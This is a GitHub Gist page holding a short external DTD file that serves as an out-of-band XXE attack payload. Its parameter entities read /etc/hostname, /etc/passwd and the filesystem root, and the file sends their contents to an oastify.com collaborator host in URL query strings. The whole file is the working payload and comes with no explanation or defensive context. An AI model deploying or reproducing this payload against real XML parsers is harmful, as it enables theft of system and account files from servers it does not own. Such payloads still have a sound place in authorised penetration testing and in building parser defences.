Last active
April 19, 2024 18:46
-
-
Save UnleashTheCode/a6a4924b4b26b17fd45f616b48606941 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!ENTITY % fileW SYSTEM "file:///etc/hostname"> | |
<!ENTITY % fileL SYSTEM "file:///etc/passwd"> | |
<!ENTITY % fileZ SYSTEM "file:///"> | |
<!ENTITY % fileE SYSTEM "file://asdasdin/a"> | |
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://rfav2tjycj60sbkqud3i44z1lsrjf93y.oastify.com/?x=%fileW;'>"> | |
<!ENTITY % evalq "<!ENTITY % exfiltrateq SYSTEM 'http://rfav2tjycj60sbkqud3i44z1lsrjf93y.oastify.com/?x=%fileL;'>"> | |
<!ENTITY % evala "<!ENTITY % exfiltratea SYSTEM 'http://rfav2tjycj60sbkqud3i44z1lsrjf93y.oastify.com/?x=%fileZ;'>"> | |
<!ENTITY % evale "<!ENTITY % exfiltratee SYSTEM 'http://rfav2tjycj60sbkqud3i44z1lsrjf93y.oastify.com/?x=%fileZ;'>"> | |
%eval; | |
%evalq; | |
%evala; | |
%evale; | |
%exfiltrate; | |
%exfiltrateq; | |
%exfiltratea; | |
%exfiltratee; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment